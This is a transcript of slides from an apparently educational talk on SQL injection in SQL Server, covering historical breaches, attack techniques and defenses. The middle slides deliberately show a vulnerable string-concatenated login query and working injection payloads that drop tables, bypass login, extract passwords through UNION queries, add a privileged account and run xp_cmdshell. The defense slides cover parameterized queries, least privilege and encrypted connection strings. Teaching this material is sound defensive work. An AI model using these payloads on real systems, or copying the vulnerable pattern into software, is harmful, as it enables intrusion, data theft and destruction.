Sql Injection
-
Upload
andrey-korshikov -
Category
Education
-
view
316 -
download
0
description
Transcript of Sql Injection
SQL Injection – are you ready for
defense?Andrey Korshikov
Krasnodar, Russia
PASS Regional Mentor for Central Eastern Europe
MVP, MCT, MCSE, MCITP, MCPD, MCSD .NET, MCDBA, MOS
Sponsors
Andrey
Korshikov
[email protected] Regional Mentor for
Central Eastern Europe
@AndreyKorshikov
About me
About me
Agenda
Problem
Attack
Defense
Statistics
• In February 2002, Jeremiah Jacks discovered that Guess.com was vulnerable
to an SQL injection attack, permitting anyone able to construct a properly-
crafted URL to pull down 200,000+ names, credit card numbers and expiration
dates in the site's customer database.
• On November 1, 2005, a teenage hacker used SQL Injection to break into the
site of a Taiwanese information security magazine from the Tech Target group
and steal customers' information.
• On March 29, 2006, a hacker discovered an SQL Injection flaw in an official
Indian government's tourism site.
• On June 29, 2007, a computer criminal defaced the Microsoft UK website using
SQL Injection. UK website The Register quoted a Microsoft spokesperson
acknowledging the problem.
• In January 2008, tens of thousands of PCs were infected by an automated SQL
Injection attack that exploited a vulnerability in application code that uses
Microsoft SQL Server as the database store.
Statistics
• …
• In May 2012, the website for Wurm Online, a massively multiplayer online
game, was shut down from an SQL Injection while the site was being updated.
• In July 2012 a hacker group was reported to have stolen 450,000 login
credentials from Yahoo!. The logins were stored in plain text and were allegedly
taken from a Yahoo subdomain, Yahoo! Voices. The group breached Yahoo's
security by using a "union-based SQL Injection technique".
• In February 2013, a group of Maldivian hackers, hacked the website " UN-
Maldives" using SQL Injection.
SQL Injection
One package of milk for 30 rubles
SELECT TOP 1 productname FROM shop
WHERE (type=‘milk' AND price=‘30')
SQL Injection
One package of milk for 30 rubles or one
kilogram of sweets for 200 rubles
SELECT TOP 1 productname FROM shop
WHERE (type=‘milk' AND price=‘30')
OR (type=‘sweets' AND price='200')
Warning!
Knowledge from my session I recommend to
use only for training.
Dangers of SQL Injection
It is easy to study and apply
Archives of solutions
http://www.exploit-db.com/
Can be automatized
Many script examples in the Network are
vulnerable for attack
Does harm to the most valuable – a database
Technical implementations
Incorrectly filtered escape characters
Incorrect type handling
UNION using
Blind SQL injection
Source data
create table users( id int,username varchar(255),password varchar(255),privs int
)go
insert into users values( 0, 'admin', 'r00t', 0xffff ),( 1, 'guest', 'guest', 0x0000 )
Application
SqlCommand comm = new SqlCommand("select * from users where username = '" + txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
Demo
Application
'; drop table users--
SqlCommand comm = new SqlCommand("select * from users where username = '" + txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
Getting data
Username: '; drop table temp--
Username: admin'--
Username: ' or 1=1--
Username: ' union select 1,'fictional_user', 'some_password', 1--
Getting data
table name
' having 1=1-- columns name
' group by users.id having 1=1 --' group by users.id, users.username,
users.password, users.privs having 1=1-- Type of data
' union select sum(username) fromusers--
' union select sum(id) from users--
Getting data
add new row
'; insert into users values( 666,'attacker', 'foobar', 0xffff )-- info about system
' union select @@version,1,1,1 -- logins
' union select min(username),1,1,1 fromusers where username > 'a'–- passwords
' union select password,1,1,1 from userswhere username = 'admin'--
Extended stored procedure
exec master..xp_cmdshell 'net1 user'
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_servicecontrol
xp_availablemedia
xp_dirtree
xp_enumdsn
xp_loginconfig
xp_makecab
xp_ntsec_enumdomains
xp_terminate_process
Demo
WinForms
Demo
Parameters in URL
Defense
Defense
Tell to the user only that he/she really needs
to know
try{
// Attempt some database operation}catch(Exception e){
errorLabel.Text = string.Concat("Sorry, your request failed. ", "If the problem persists please report the following message ", "to technical support", Environment.Newline, e.Message);}
try{
// Attempt some database operation}catch(Exception e){
int id = ErrorLogger.LogException(e);errorLabel.Text = string.Format("Sorry, your request
Failed. If the problem persists please report error code {0} to the technical support team.", id);}
Defense
Check of all entered data
size
content of string variables
using XML-schema
decline symbols ; ' -- /* */ xp_
Use stored procedures
Defense
Use the parameterized input with stored
procedures
SqlDataAdapter myCommand = newSqlDataAdapter("LoginStoredProcedure'" + Login.Text + "'", conn);
Defense
Use SQL parameters of safe types
SqlDataAdapter myCommand = newSqlDataAdapter("AuthorLogin", conn);
myCommand.SelectCommand.CommandType = CommandType.StoredProcedure;
SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@au_id", SqlDbType.VarChar, 11);
parm.Value = Login.Text;
Defense
Pack parameters by functions QUOTENAME() and REPLACE()
--before:SET @temp = 'select * from authors where au_lname=''' + @au_lname + '''‘
--after:SET @temp = 'select * from authors where au_lname=''' +REPLACE(@au_lname,'''','''''') + ''''
Defense
Execute with least privilege
<add key="cnxNWindBad"value="server=localhost;uid=sa;pwd=;database=northwind;" />
<add key="cnxNWindGood"value="server=localhost;uid=NWindReader;pwd=utbbeesozg4d; database=northwind;" />
Defense
Secrets must be secrets
<add key="cnxNWindBest"value="AQAAANCMnd8BFdERjHoAwE/ Cl+sBAAAAcWMZ8XhPz0O8jHcS1539LAQAAAACAAAAAAADZgAAqAAAABAAAABdodw0YhWfcC6+ UjUUOiMwAAAAAASAAACgAAAAEAAAALPzjTRnAPt7/W8v38ikHL5IAAAAzctRyEcHxWkzxeqbq/ V9ogaSqS4UxvKC9zmrXUoJ9mwrNZ/ XZ9LgbfcDXIIAXm2DLRCGRHMtrZrp9yledz0n9kgP3b3s+ X8wFAAAANmLu0UfOJdTc4WjlQQgmZElY7Z8" />
Defense
Secrets must be secrets
string strCnx = SecureConnection.GetCnxString("cnxNWindBest");public class SecureConnection {
static public string GetCnxString(string configKey)
{
string strCnx;
try { // get encrypted string from web.config
string strEncryptedCnx = ConfigurationSettings.AppSettings[configKey];
// decrypt
string DataProtector dp = new DataProtector(DataProtector.Store.USE_MACHINE_STORE);
byte[] dataToDecrypt = Convert.FromBase64String(strEncryptedCnx);
strCnx = Encoding.ASCII.GetString(dp.Decrypt(dataToDecrypt,null));
} catch { strCnx=""; } return strCnx; } }
*Win32 Data Protection API (DPAPI) (System.Security.Cryptography)
Defense
Secrets must be secrets
EncryptByPassPhrase
DecryptByPassPhrase
DECLARE @plaintext nvarchar(1000), @enc_textvarbinary(2000)SET @plaintext='Я помню чудное мгновенье'SET@enc_text=ENCRYPTBYPASSPHRASE('Krasnodar',@plaintext)SELECT 'Оригинальный текст: ', @plaintextSELECT 'Зашифрованный текст:', @enc_textSELECT 'Расшифровка:',CAST(DECRYPTBYPASSPHRASE('Krasnodar',@enc_text) asnvarchar(1000))
Demo
Defense on all layers
Defense (conclusion)
Tell to the user only that he needs really to know
Check of all entered data
Use stored procedures
Use SQL parameters of safe types
Pack parameters by functions QUOTENAME() and REPLACE()
Execute with Least Privilege
Secrets must be secrets
Defense on all layers
Resources
SQL Injection
SQL Injection FAQ
Hacking website using SQL Injection - step by step
guide
Dynamic SQL & SQL injection
Advanced SQL Injection In SQL Server Applications
Stop SQL Injection Attacks Before They Stop You
SQL Injection - Why I Don't Think Parameterization
is Enough
Questions
Sponsors